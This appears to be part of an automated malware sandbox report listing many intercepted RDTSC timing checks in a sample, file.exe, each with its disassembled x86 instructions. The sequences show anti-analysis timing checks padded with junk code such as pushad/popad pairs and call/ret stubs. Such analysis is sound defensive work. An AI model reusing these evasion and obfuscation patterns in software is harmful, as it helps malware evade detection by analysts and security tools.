              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8091E0 second address: 8091FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C120028Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnp 00007FE4C1200298h 0x00000010 push eax 0x00000011 push edx 0x00000012 jg 00007FE4C1200286h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8091FE second address: 809290 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE4C10F4F66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007FE4C10F4F68h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 mov di, 6ED1h 0x00000029 mov ch, A8h 0x0000002b mov ebx, dword ptr [ebp+1248C27Eh] 0x00000031 push 00000000h 0x00000033 push eax 0x00000034 call 00007FE4C10F4F68h 0x00000039 pop eax 0x0000003a mov dword ptr [esp+04h], eax 0x0000003e add dword ptr [esp+04h], 0000001Ch 0x00000046 inc eax 0x00000047 push eax 0x00000048 ret 0x00000049 pop eax 0x0000004a ret 0x0000004b mov edx, dword ptr [ebp+122D2A50h] 0x00000051 add eax, ebx 0x00000053 jmp 00007FE4C10F4F71h 0x00000058 call 00007FE4C10F4F70h 0x0000005d movzx ecx, dx 0x00000060 pop edx 0x00000061 nop 0x00000062 push eax 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8553D6 second address: 8553EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 je 00007FE4C1200288h 0x0000000d pushad 0x0000000e popad 0x0000000f je 00007FE4C120028Eh 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8546A6 second address: 8546B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FE4C10F4F66h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8546B0 second address: 8546B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8546B4 second address: 8546D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE4C10F4F71h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 854DDB second address: 854DF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C120028Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 854DF4 second address: 854DFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 854DFA second address: 854DFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 857636 second address: 85763C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85A436 second address: 85A43C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85A43C second address: 85A458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE4C10F4F75h 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85A458 second address: 85A462 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FE4C1200286h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85A462 second address: 85A466 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 859DCC second address: 859DD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FE4C1200286h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 859DD8 second address: 859DF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE4C10F4F70h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85BA85 second address: 85BA8F instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE4C1200286h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85BA8F second address: 85BA95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85BA95 second address: 85BAAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FE4C120028Fh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85BAAA second address: 85BAF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C10F4F74h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jmp 00007FE4C10F4F72h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop ebx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jmp 00007FE4C10F4F75h 0x0000001c push eax 0x0000001d pop eax 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 862B2C second address: 862B30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 862B30 second address: 862B41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C10F4F6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 862B41 second address: 862B49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 862B49 second address: 862B4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 860CF0 second address: 860CF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 860CF4 second address: 860D01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 860D01 second address: 860D17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FE4C120028Dh 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 860D17 second address: 860D21 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE4C10F4F66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86139E second address: 8613A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8613A2 second address: 8613A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8616F5 second address: 8616FA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 861CC8 second address: 861CCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86281F second address: 86284D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE4C1200299h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE4C120028Dh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86A8C5 second address: 86A8CF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86A8CF second address: 86A8D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86A8D3 second address: 86A8D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86B12F second address: 86B135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86B135 second address: 86B142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007FE4C10F4F6Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86B142 second address: 86B146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86B146 second address: 86B160 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE4C10F4F72h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86CCA5 second address: 86CCAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86CCAB second address: 86CCAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 872356 second address: 87237F instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE4C1200286h 0x00000008 jmp 00007FE4C1200291h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FE4C120028Ch 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87237F second address: 872383 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 872383 second address: 872389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 872389 second address: 8723BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jno 00007FE4C10F4F6Ah 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FE4C10F4F71h 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 popad 0x00000019 pushad 0x0000001a push edx 0x0000001b pop edx 0x0000001c push esi 0x0000001d pop esi 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 872945 second address: 872954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007FE4C120028Ah 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 872954 second address: 87295F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FE4C10F4F66h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87295F second address: 872967 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872AC7 second address: 872ACD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872ACD second address: 872AD7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE4C12002A0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872C4D second address: 872C57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FE4C10F4F66h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872C57 second address: 872C5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 874090 second address: 8740E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c jns 00007FE4C10F4F66h 0x00000012 js 00007FE4C10F4F66h 0x00000018 jmp 00007FE4C10F4F70h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FE4C10F4F74h 0x00000025 jmp 00007FE4C10F4F74h 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 871F16 second address: 871F2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop esi 0x00000008 pushad 0x00000009 jng 00007FE4C120028Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 871F2D second address: 871F44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE4C10F4F73h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 871F44 second address: 871F53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C120028Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BAFA9 second address: 7BAFB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FE4C10F4F66h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87C4D7 second address: 87C4DD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87C4DD second address: 87C4F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE4C10F4F6Dh 0x0000000d jo 00007FE4C10F4F66h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8880E1 second address: 8880E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8880E5 second address: 8880E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8880E9 second address: 888106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007FE4C1200292h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888106 second address: 888112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push edx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 887CCD second address: 887CD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FE4C1200286h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88C3EF second address: 88C3FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88C3FA second address: 88C400 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88BF55 second address: 88BF59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88BF59 second address: 88BFA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE4C1200293h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c pushad 0x0000000d jmp 00007FE4C1200297h 0x00000012 jnl 00007FE4C120028Eh 0x00000018 push eax 0x00000019 push edx 0x0000001a push edx 0x0000001b pop edx 0x0000001c jnp 00007FE4C1200286h 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A0451 second address: 8A0464 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE4C10F4F66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jno 00007FE4C10F4F66h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A0464 second address: 8A046A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A046A second address: 8A046F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A046F second address: 8A0481 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE4C120028Ch 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A0260 second address: 8A0281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FE4C10F4F76h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A0281 second address: 8A02D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jp 00007FE4C1200286h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jc 00007FE4C1200286h 0x00000013 jnc 00007FE4C1200286h 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007FE4C120028Ch 0x00000020 popad 0x00000021 pushad 0x00000022 jmp 00007FE4C1200297h 0x00000027 jg 00007FE4C1200286h 0x0000002d popad 0x0000002e popad 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 pushad 0x00000033 popad 0x00000034 pushad 0x00000035 popad 0x00000036 jno 00007FE4C1200286h 0x0000003c popad 0x0000003d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A53D6 second address: 8A53DC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A5520 second address: 8A553A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push edx 0x00000006 pop edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 popad 0x0000000a je 00007FE4C1200288h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A553A second address: 8A5540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A5540 second address: 8A5544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A5544 second address: 8A5569 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FE4C10F4F77h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jbe 00007FE4C10F4F66h 0x00000012 pop ecx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A59A2 second address: 8A59A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A59A8 second address: 8A59B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FE4C10F4F68h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A5B50 second address: 8A5B56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A5B56 second address: 8A5B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE4C10F4F75h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A5CFB second address: 8A5CFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A5E2D second address: 8A5E64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C10F4F78h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jng 00007FE4C10F4F66h 0x00000010 jmp 00007FE4C10F4F6Bh 0x00000015 ja 00007FE4C10F4F66h 0x0000001b push esi 0x0000001c pop esi 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A5E64 second address: 8A5E6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FE4C1200286h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B6299 second address: 8B629D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B629D second address: 8B62A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C732A second address: 8C732F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DC508 second address: 8DC524 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE4C1200296h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DC524 second address: 8DC52A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DC52A second address: 8DC536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DC536 second address: 8DC53C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DC660 second address: 8DC67E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE4C1200293h 0x00000008 jl 00007FE4C1200286h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
